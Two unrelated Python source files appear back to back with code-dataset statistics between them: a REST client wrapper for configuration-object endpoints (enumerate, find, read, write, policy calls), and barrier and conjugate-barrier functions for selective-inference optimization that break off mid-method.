class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def objects(self):
return [Config.Object(obj) for obj in self._from_json(key='Objects')]
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _EnumerateAll(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/EnumerateAll')
def post(self, pattern: str):
body = {
"Pattern": pattern
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def objects(self):
return [Config.Object(obj) for obj in self._from_json(key='Objects')]
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _EnumerateObjectsDerivedFrom(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/EnumerateObjectsDerivedFrom')
def post(self, derived_from: str, pattern: str = None, object_dn: str = None):
body = {
"ObjectDN": object_dn,
"DerivedFrom": derived_from,
"Pattern": pattern
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def objects(self):
return [Config.Object(obj) for obj in self._from_json(key='Objects')]
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _EnumeratePolicies(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/EnumeratePolicies')
def post(self, object_dn: str):
body = {
"ObjectDN": object_dn
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def policies(self):
return [Config.Policy(obj) for obj in self._from_json(key='Policies')]
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _Find(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/Find')
def post(self, pattern: str, attribute_names: str = None):
body = {
"Pattern": pattern,
"AttributeNames": attribute_names
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def objects(self):
return [Config.Object(obj) for obj in self._from_json(key='Objects')]
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _FindContainers(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/FindContainers')
def post(self, object_dn: str, recursive: bool = False):
body = {
"ObjectDN": object_dn,
"Recursive": recursive
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def objects(self):
return [Config.Object(obj) for obj in self._from_json(key='Objects')]
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _FindObjectsOfClass(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/FindObjectsOfClass')
def post(self, classes: str = None, class_name: str = None, object_dn: str = None, pattern: str = None, recursive: bool = False):
if not (classes or class_name):
raise AssertionError('One of "classes" or "class_name" parameters must be provided.')
body = {
"Classes": classes,
"Class": class_name,
'ObjectDN': object_dn,
'Pattern': pattern,
'Recursive': recursive
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def objects(self):
return [Config.Object(obj) for obj in self._from_json(key='Objects')]
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _FindPolicy(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/FindPolicy')
def post(self, object_dn: str, class_name: str, attribute_name: str):
body = {
"ObjectDN": object_dn,
"Class": class_name,
"AttributeName": attribute_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def locked(self) -> bool:
return self._from_json(key='Locked')
@property
@api_response_property()
def policy_dn(self) -> str:
return self._from_json(key='PolicyDN')
@property
@api_response_property()
def values(self) -> List[str]:
return self._from_json(key='Values')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _GetHighestRevision(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/GetHighestRevision')
def post(self, object_dn: str, classes: str = None):
body = {
"ObjectDN": object_dn,
'Classes': classes
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def revision(self) -> str:
return self._from_json(key='Revision')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _GetRevision(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/GetRevision')
def post(self, object_dn: str):
body = {
"ObjectDN": object_dn
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def revision(self) -> str:
return self._from_json(key='Revision')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _GuidToDn(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/GuidToDn')
def post(self, object_guid: str):
body = {
"ObjectGUID": object_guid
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def object_dn(self) -> str:
return self._from_json(key='ObjectDN')
@property
@api_response_property()
def class_name(self) -> str:
return self._from_json(key='ClassName')
@property
@api_response_property()
def revision(self) -> str:
return self._from_json(key='Revision')
@property
@api_response_property()
def hierarchical_guid(self) -> str:
return self._from_json(key='HierarchicalGUID')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _IdInfo(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/IdInfo')
def post(self, object_id: str):
body = {
"ObjectID": object_id
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def guid(self) -> str:
return self._from_json(key='GUID')
@property
@api_response_property()
def class_name(self) -> str:
return self._from_json(key='ClassName')
@property
@api_response_property()
def revision(self) -> str:
return self._from_json(key='Revision')
@property
@api_response_property()
def hierarchical_guid(self) -> str:
return self._from_json(key='HierarchicalGUID')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _IsValid(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/IsValid')
def post(self, object_dn: str = None, object_guid: str = None):
if not (object_dn or object_guid):
raise AssertionError('One of "classes" or "class_name" parameters must be provided.')
body = {
"ObjectGUID": object_guid,
"ObjectDN": object_dn
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def object(self):
return Config.Object(self._from_json(key='Object'))
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _MutateObject(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/MutateObject')
def post(self, object_dn: str, class_name: str):
body = {
"ObjectDN": object_dn,
"Class": class_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _Read(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/Read')
def post(self, object_dn: str, attribute_name: str):
body = {
"ObjectDN": object_dn,
"AttributeName": attribute_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def object_dn(self) -> str:
return self._from_json(key='ObjectDN')
@property
@api_response_property()
def attribute_name(self) -> str:
return self._from_json(key='AttributeName')
@property
@api_response_property()
def values(self) -> List[str]:
return self._from_json(key='Values')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _ReadAll(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/ReadAll')
def post(self, object_dn: str):
body = {
"ObjectDN": object_dn
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def name_values(self):
return [Config.NameValues(nv) for nv in self._from_json(key='NameValues')]
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _ReadDn(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/ReadDn')
def post(self, object_dn: str, attribute_name: str):
body = {
"ObjectDN": object_dn,
"AttributeName": attribute_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def values(self) -> List[str]:
return self._from_json(key='Values')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _ReadDnReferences(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/ReadDnReferences')
def post(self, object_dn: str, reference_attribute_name: str, attribute_name: str):
body = {
"ObjectDN": object_dn,
"ReferenceAttributeName": reference_attribute_name,
"AttributeName": attribute_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def values(self) -> List[str]:
return self._from_json(key='Values', return_on_error=list)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _ReadEffectivePolicy(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/ReadEffectivePolicy')
def post(self, object_dn: str, attribute_name: str):
body = {
"ObjectDN": object_dn,
"AttributeName": attribute_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def values(self) -> List[str]:
return self._from_json(key='Values')
@property
@api_response_property()
def locked(self) -> bool:
return self._from_json(key='Locked')
@property
@api_response_property()
def overridden(self) -> bool:
return self._from_json(key='Overridden')
@property
@api_response_property()
def policy_dn(self) -> str:
return self._from_json(key='PolicyDN')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _ReadPolicy(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/ReadPolicy')
def post(self, object_dn: str, attribute_name: str, class_name: str):
body = {
"ObjectDN": object_dn,
"AttributeName": attribute_name,
"Class": class_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def locked(self) -> bool:
return self._from_json(key='Locked')
@property
@api_response_property()
def values(self) -> List[str]:
return self._from_json(key='Values', return_on_error=list)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _RemoveDnValue(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/RemoveDnValue')
def post(self, object_dn: str, attribute_name: str, value: str):
body = {
"ObjectDN": object_dn,
"AttributeName": attribute_name,
"Value": value
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _RemovePolicyValue(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/RemovePolicyValue')
def post(self, object_dn: str, attribute_name: str, class_name: str, value: str):
body = {
"ObjectDN": object_dn,
"AttributeName": attribute_name,
"Class": class_name,
"Value": value
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _RenameObject(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/RenameObject')
def post(self, object_dn: str, new_object_dn: str):
body = {
"ObjectDN": object_dn,
"NewObjectDN": new_object_dn
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _Write(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/Write')
def post(self, object_dn: str, attribute_data: dict):
body = {
"ObjectDN": object_dn,
"AttributeData": attribute_data
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _WriteDn(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/WriteDn')
def post(self, object_dn: str, attribute_name: str, values: List[str]):
body = {
"ObjectDN": object_dn,
"AttributeName": attribute_name,
"Values": values
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _WritePolicy(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/WritePolicy')
def post(self, object_dn: str, class_name: str, attribute_name: str, locked: bool = False, values: str = None):
body = {
"ObjectDN": object_dn,
"Class": class_name,
"AttributeName": attribute_name,
"Locked": locked,
"Values": values
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
| 35.62069
| 137
| 0.527401
| 3,507
| 37,188
| 5.181637
| 0.035643
| 0.060092
| 0.0826
| 0.115893
| 0.843055
| 0.806405
| 0.795179
| 0.785439
| 0.776139
| 0.766839
| 0
| 0
| 0.373561
| 37,188
| 1,043
| 138
| 35.654842
| 0.780048
| 0
| 0
| 0.747239
| 0
| 0
| 0.058298
| 0.009439
| 0
| 0
| 0
| 0
| 0.002454
| 1
| 0.233129
| false
| 0
| 0.003681
| 0.095706
| 0.469939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f8b2a0596d7c463b3cdce1255751df03d69081b4
| 23,828
|
py
|
Python
|
selectinf/sandbox/bayesian/barrier.py
|
TianXie1999/selective-inference
|
ca02bbd84af5f5597944c75bde8337db9c69066a
|
[
"BSD-3-Clause"
] | 51
|
2016-03-31T16:34:15.000Z
|
2022-01-16T04:32:58.000Z
|
selectinf/sandbox/bayesian/barrier.py
|
TianXie1999/selective-inference
|
ca02bbd84af5f5597944c75bde8337db9c69066a
|
[
"BSD-3-Clause"
] | 11
|
2016-04-07T00:19:58.000Z
|
2021-10-03T18:31:14.000Z
|
selectinf/sandbox/bayesian/barrier.py
|
TianXie1999/selective-inference
|
ca02bbd84af5f5597944c75bde8337db9c69066a
|
[
"BSD-3-Clause"
] | 14
|
2015-10-28T17:29:05.000Z
|
2021-08-16T21:04:30.000Z
|
import numpy as np
import regreg.api as rr
from scipy.optimize import bisect, minimize
def cube_barrier_scaled(argument, lagrange, cube_scale= 1.):
'''
Barrier approximation to the
cube $[-\lambda,\lambda]^k$ with $\lambda$ being `lagrange`.
The function is
$$
z \mapsto \log(1 + 1 / (\lambda - z)) + \log(1 + 1 / (z + \lambda))
$$
with $z$ being `argument`
'''
BIG = 10 ** 10 # our Newton method will never evaluate this
# with any violations, but `scipy.minimize` does
_diff = argument - lagrange # z - \lambda < 0
_sum = argument + lagrange # z + \lambda > 0
violations = ((_diff >= 0).sum() + (_sum <= 0).sum() > 0)
return np.log((_diff - (cube_scale*lagrange)) * (_sum + (cube_scale*lagrange)) / (_diff * _sum)).sum() + BIG * violations
def cube_gradient_scaled(argument, lagrange, cube_scale= 1.):
"""
Gradient of approximation to the
cube $[-\lambda,\lambda]^k$ with $\lambda$ being `lagrange`.
The function is
$$
z \mapsto \frac{2}{\lambda - z} - \frac{1}{\lambda - z + 1} +
\frac{1}{z - \lambda + 1}
$$
with $z$ being `argument`
"""
_diff = argument - lagrange # z - \lambda < 0
_sum = argument + lagrange # z + \lambda > 0
return 1. / (_diff - (cube_scale*lagrange)) - 1. / _diff + 1. / (_sum + (cube_scale*lagrange)) - 1. / _sum
def cube_hessian_scaled(argument, lagrange, cube_scale= 1.):
"""
(Diagonal) Heissian of approximation to the
cube $[-\lambda,\lambda]^k$ with $\lambda$ being `lagrange`.
The function is
$$
z \mapsto \frac{2}{\lambda - z} - \frac{1}{\lambda - z + 1} +
\frac{1}{z - \lambda + 1}
$$
with $z$ being `argument`
"""
_diff = argument - lagrange # z - \lambda < 0
_sum = argument + lagrange # z + \lambda > 0
return 1. / _diff ** 2 - 1. / (_diff - (cube_scale*lagrange)) ** 2 + 1. / _sum ** 2 - \
1. / (_sum + (cube_scale*lagrange)) ** 2
def cube_barrier_softmax_coord(z, lam):
_diff = z - lam
_sum = z + lam
if -lam + np.power(10, -10) < z < lam - np.power(10, -10):
return np.log((_diff - 1.) * (_sum + 1.) / (_diff * _sum))
else:
return 2 * np.log(1+(10 ** 10))
class barrier_conjugate_log(rr.smooth_atom):
"""
Conjugate of a barrier for the
product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.
"""
def __init__(self,
cube_bool, # -E
lagrange, # cube half lengths
barrier_scale=None, # maybe scale each coordinate in future?
coef=1.,
offset=None,
quadratic=None):
p = cube_bool.shape[0]
orthant_bool = ~cube_bool
initial = np.ones(p)
initial[cube_bool] = lagrange * 0.5
if barrier_scale is None:
barrier_scale = 1.
(self.cube_bool,
self.orthant_bool,
self.lagrange,
self.barrier_scale) = (cube_bool,
orthant_bool,
lagrange,
barrier_scale)
rr.smooth_atom.__init__(self,
(p,),
offset=offset,
quadratic=quadratic,
initial=initial,
coef=coef)
def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-6):
# here we compute those expressions in the note
arg = self.apply_offset(arg) # all smooth_objectives should do this....
cube_arg = arg[self.cube_bool]
orthant_arg = arg[self.orthant_bool]
if check_feasibility and np.any(orthant_arg >= -tol):
if mode == 'func':
return np.inf
elif mode == 'grad':
return np.nan * np.ones(self.shape)
elif mode == 'both':
return np.inf, np.nan * np.ones(self.shape)
else:
raise ValueError('mode incorrectly specified')
orthant_maximizer = - 0.5 + np.sqrt(0.25 - 1. / orthant_arg)
orthant_val = np.sum(orthant_maximizer * orthant_arg -
np.log(1 + 1. / orthant_maximizer))
cube_maximizer = -1. / cube_arg + np.sign(cube_arg) * np.sqrt(1. / cube_arg ** 2 + self.lagrange ** 2)
cube_val = np.sum(cube_maximizer * cube_arg + np.log(self.lagrange - cube_maximizer) +
np.log(self.lagrange + cube_maximizer) - (2 * np.log(self.lagrange)))
if mode == 'func':
return cube_val + orthant_val
elif mode == 'grad':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return g
elif mode == 'both':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return cube_val + orthant_val, g
else:
raise ValueError('mode incorrectly specified')
class barrier_conjugate_softmax(rr.smooth_atom):
"""
Conjugate of a barrier for the
product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.
"""
def __init__(self,
cube_bool, # -E
lagrange, # cube half lengths
barrier_scale=None, # maybe scale each coordinate in future?
coef=1.,
offset=None,
quadratic=None):
p = cube_bool.shape[0]
orthant_bool = ~cube_bool
initial = np.ones(p)
self._initial = initial[cube_bool] = lagrange * 0.5
if barrier_scale is None:
barrier_scale = 1.
(self.cube_bool,
self.orthant_bool,
self.lagrange,
self.barrier_scale) = (cube_bool,
orthant_bool,
lagrange,
barrier_scale)
rr.smooth_atom.__init__(self,
(p,),
offset=offset,
quadratic=quadratic,
initial=initial,
coef=coef)
def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-6):
# here we compute those expressions in the note
arg = self.apply_offset(arg) # all smooth_objectives should do this....
cube_arg = arg[self.cube_bool]
orthant_arg = arg[self.orthant_bool]
if check_feasibility and np.any(orthant_arg >= -tol):
if mode == 'func':
return np.inf
elif mode == 'grad':
return np.nan * np.ones(self.shape)
elif mode == 'both':
return np.inf, np.nan * np.ones(self.shape)
else:
raise ValueError('mode incorrectly specified')
orthant_maximizer = - 0.5 + np.sqrt(0.25 - 1. / orthant_arg)
orthant_val = np.sum(orthant_maximizer * orthant_arg -
np.log(1 + 1. / orthant_maximizer))
def cube_conjugate_grad(z, u, j):
_diff = z - self.lagrange[j] # z - \lambda < 0
_sum = z + self.lagrange[j] # z + \lambda > 0
return u - (1. / (_diff - self.lagrange[j]) - 1. / _diff + 1. / (_sum + self.lagrange[j]) - 1. / _sum)
#def cube_conjugate(z, u, j):
# return -u * z + cube_barrier_softmax_coord(z, self.lagrange[j])
cube_maximizer = np.zeros(cube_arg.shape[0])
#for i in range(cube_arg.shape[0]):
# u = cube_arg[i]
# j = i
# bounds = [(-self.lagrange[i], self.lagrange[i])]
# res = minimize(cube_conjugate, x0=(self._initial)[i], args=(u,j), bounds=bounds)
# cube_maximizer[i] = res.x
for i in range(cube_arg.shape[0]):
u = cube_arg[i]
j = i
cube_maximizer[i] = bisect(cube_conjugate_grad, a=-self.lagrange[j] + 1e-10,
b=self.lagrange[j] - 1e-10, args=(u, j),
rtol=4.4408920985006262e-5, maxiter=32)
cube_val = np.sum(cube_maximizer * cube_arg - np.log(1. + (self.lagrange / self.lagrange - cube_maximizer))
- np.log(1. + (self.lagrange / self.lagrange + cube_maximizer)))
if mode == 'func':
return cube_val + orthant_val
elif mode == 'grad':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return g
elif mode == 'both':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return cube_val + orthant_val, g
else:
raise ValueError('mode incorrectly specified')
class barrier_conjugate_softmax_scaled(rr.smooth_atom):
"""
Conjugate of a barrier for the
product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.
"""
def __init__(self,
cube_bool, # -E
lagrange, # cube half lengths
cube_scale = 1.,
barrier_scale=1., # maybe scale each coordinate in future?
coef=1.,
offset=None,
quadratic=None):
p = cube_bool.shape[0]
orthant_bool = ~cube_bool
initial = np.ones(p)
self._initial = initial[cube_bool] = lagrange * 0.5
if barrier_scale is None:
barrier_scale = 1.
(self.cube_bool,
self.orthant_bool,
self.lagrange,
self.cube_scale,
self.barrier_scale) = (cube_bool,
orthant_bool,
lagrange,
cube_scale,
barrier_scale)
rr.smooth_atom.__init__(self,
(p,),
offset=offset,
quadratic=quadratic,
initial=initial,
coef=coef)
def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-12):
# here we compute those expressions in the note
arg = self.apply_offset(arg) # all smooth_objectives should do this....
cube_arg = arg[self.cube_bool]
orthant_arg = arg[self.orthant_bool]
if check_feasibility and np.any(orthant_arg >= -tol):
raise ValueError('returning nan gradient')
if mode == 'func':
return np.inf
elif mode == 'grad':
return np.nan * np.ones(self.shape)
elif mode == 'both':
return np.inf, np.nan * np.ones(self.shape)
else:
raise ValueError('mode incorrectly specified')
orthant_maximizer = (- 0.5*self.barrier_scale) + np.sqrt((0.25*(self.barrier_scale**2)) -
(self.barrier_scale / orthant_arg))
if np.any(np.isnan(orthant_maximizer)):
raise ValueError('maximizer is nan')
orthant_val = np.sum(orthant_maximizer * orthant_arg -
np.log(1 + (self.barrier_scale / orthant_maximizer)))
def cube_conjugate_grad(z, u, j):
_diff = z - self.lagrange[j] # z - \lambda < 0
_sum = z + self.lagrange[j] # z + \lambda > 0
return u - (1. / (_diff - (self.cube_scale*self.lagrange[j])) - 1. / _diff +
1. / (_sum + (self.cube_scale*self.lagrange[j])) - 1. / _sum)
#def cube_conjugate(z, u, j):
# return -u * z + cube_barrier_softmax_coord(z, self.lagrange[j])
cube_maximizer = np.zeros(cube_arg.shape[0])
#for i in range(cube_arg.shape[0]):
# u = cube_arg[i]
# j = i
# bounds = [(-self.lagrange[i], self.lagrange[i])]
# res = minimize(cube_conjugate, x0=(self._initial)[i], args=(u,j), bounds=bounds)
# cube_maximizer[i] = res.x
for i in range(cube_arg.shape[0]):
u = cube_arg[i]
j = i
cube_maximizer[i] = bisect(cube_conjugate_grad, a=-self.lagrange[j] + 1e-10,
b=self.lagrange[j] - 1e-10, args=(u, j),
rtol=4.4408920985006262e-5, maxiter=32)
if np.any(np.isnan(cube_maximizer)):
raise ValueError('cube maximizer is nan')
cube_val = np.sum(cube_maximizer * cube_arg - np.log(1. + ((self.cube_scale*self.lagrange)
/ (self.lagrange - cube_maximizer)))
- np.log(1. + ((self.cube_scale*self.lagrange) / (self.lagrange + cube_maximizer))))
if mode == 'func':
return cube_val + orthant_val
elif mode == 'grad':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return g
elif mode == 'both':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return cube_val + orthant_val, g
else:
raise ValueError('mode incorrectly specified')
class barrier_conjugate_softmax_scaled(rr.smooth_atom):
"""
Conjugate of a barrier for the
product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.
"""
def __init__(self,
cube_bool, # -E
lagrange, # cube half lengths
cube_scale = 1.,
barrier_scale=1., # maybe scale each coordinate in future?
coef=1.,
offset=None,
quadratic=None):
p = cube_bool.shape[0]
orthant_bool = ~cube_bool
initial = np.ones(p)
self._initial = initial[cube_bool] = lagrange * 0.5
if barrier_scale is None:
barrier_scale = 1.
(self.cube_bool,
self.orthant_bool,
self.lagrange,
self.cube_scale,
self.barrier_scale) = (cube_bool,
orthant_bool,
lagrange,
cube_scale,
barrier_scale)
rr.smooth_atom.__init__(self,
(p,),
offset=offset,
quadratic=quadratic,
initial=initial,
coef=coef)
def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-12):
# here we compute those expressions in the note
arg = self.apply_offset(arg) # all smooth_objectives should do this....
cube_arg = arg[self.cube_bool]
orthant_arg = arg[self.orthant_bool]
if check_feasibility and np.any(orthant_arg >= -tol):
raise ValueError('returning nan gradient')
if mode == 'func':
return np.inf
elif mode == 'grad':
return np.nan * np.ones(self.shape)
elif mode == 'both':
return np.inf, np.nan * np.ones(self.shape)
else:
raise ValueError('mode incorrectly specified')
orthant_maximizer = (- 0.5*self.barrier_scale) + np.sqrt((0.25*(self.barrier_scale**2)) -
(self.barrier_scale / orthant_arg))
if np.any(np.isnan(orthant_maximizer)):
raise ValueError('maximizer is nan')
orthant_val = np.sum(orthant_maximizer * orthant_arg -
np.log(1 + (self.barrier_scale / orthant_maximizer)))
def cube_conjugate_grad(z, u, j):
_diff = z - self.lagrange[j] # z - \lambda < 0
_sum = z + self.lagrange[j] # z + \lambda > 0
return u - (1. / (_diff - (self.cube_scale*self.lagrange[j])) - 1. / _diff +
1. / (_sum + (self.cube_scale*self.lagrange[j])) - 1. / _sum)
#def cube_conjugate(z, u, j):
# return -u * z + cube_barrier_softmax_coord(z, self.lagrange[j])
cube_maximizer = np.zeros(cube_arg.shape[0])
#for i in range(cube_arg.shape[0]):
# u = cube_arg[i]
# j = i
# bounds = [(-self.lagrange[i], self.lagrange[i])]
# res = minimize(cube_conjugate, x0=(self._initial)[i], args=(u,j), bounds=bounds)
# cube_maximizer[i] = res.x
for i in range(cube_arg.shape[0]):
u = cube_arg[i]
j = i
cube_maximizer[i] = bisect(cube_conjugate_grad, a=-self.lagrange[j] + 1e-10,
b=self.lagrange[j] - 1e-10, args=(u, j),
rtol=4.4408920985006262e-5, maxiter=32)
if np.any(np.isnan(cube_maximizer)):
raise ValueError('cube maximizer is nan')
cube_val = np.sum(cube_maximizer * cube_arg - np.log(1. + ((self.cube_scale*self.lagrange)
/ (self.lagrange - cube_maximizer)))
- np.log(1. + ((self.cube_scale*self.lagrange) / (self.lagrange + cube_maximizer))))
if mode == 'func':
return cube_val + orthant_val
elif mode == 'grad':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return g
elif mode == 'both':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return cube_val + orthant_val, g
else:
raise ValueError('mode incorrectly specified')
###########################################################
class linear_map(rr.smooth_atom):
def __init__(self,
dual_arg,
coef=1.,
offset=None,
quadratic=None):
self.dual_arg = dual_arg
p = self.dual_arg.shape[0]
rr.smooth_atom.__init__(self,
(p,),
offset=offset,
quadratic=quadratic,
coef=coef)
def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-6):
arg = self.apply_offset(arg)
if mode == 'func':
f = self.dual_arg.T.dot(arg)
return f
elif mode == 'grad':
g = self.dual_arg
return g
elif mode == 'both':
f = self.dual_arg.T.dot(arg)
g = self.dual_arg
return f, g
else:
raise ValueError('mode incorrectly specified')
class barrier_conjugate_softmax_scaled_rr(rr.smooth_atom):
"""
Conjugate of a barrier for the
product $[0,\infty)^E \times [-\lambda,\lambda]^{-E}$.
"""
def __init__(self,
cube_bool, # -E
lagrange, # cube half lengths
cube_scale = 1.,
barrier_scale=1., # maybe scale each coordinate in future?
coef=1.,
offset=None,
quadratic=None):
p = cube_bool.shape[0]
orthant_bool = ~cube_bool
initial = np.ones(p)
self._initial = initial[cube_bool] = lagrange * 0.5
if barrier_scale is None:
barrier_scale = 1.
(self.cube_bool,
self.orthant_bool,
self.lagrange,
self.cube_scale,
self.barrier_scale) = (cube_bool,
orthant_bool,
lagrange,
cube_scale,
barrier_scale)
rr.smooth_atom.__init__(self,
(p,),
offset=offset,
quadratic=quadratic,
initial=initial,
coef=coef)
def smooth_objective(self, arg, mode='both', check_feasibility=False, tol=1.e-12):
# here we compute those expressions in the note
arg = self.apply_offset(arg) # all smooth_objectives should do this....
cube_arg = arg[self.cube_bool]
orthant_arg = arg[self.orthant_bool]
if check_feasibility and np.any(orthant_arg >= -tol):
raise ValueError('returning nan gradient')
if mode == 'func':
return np.inf
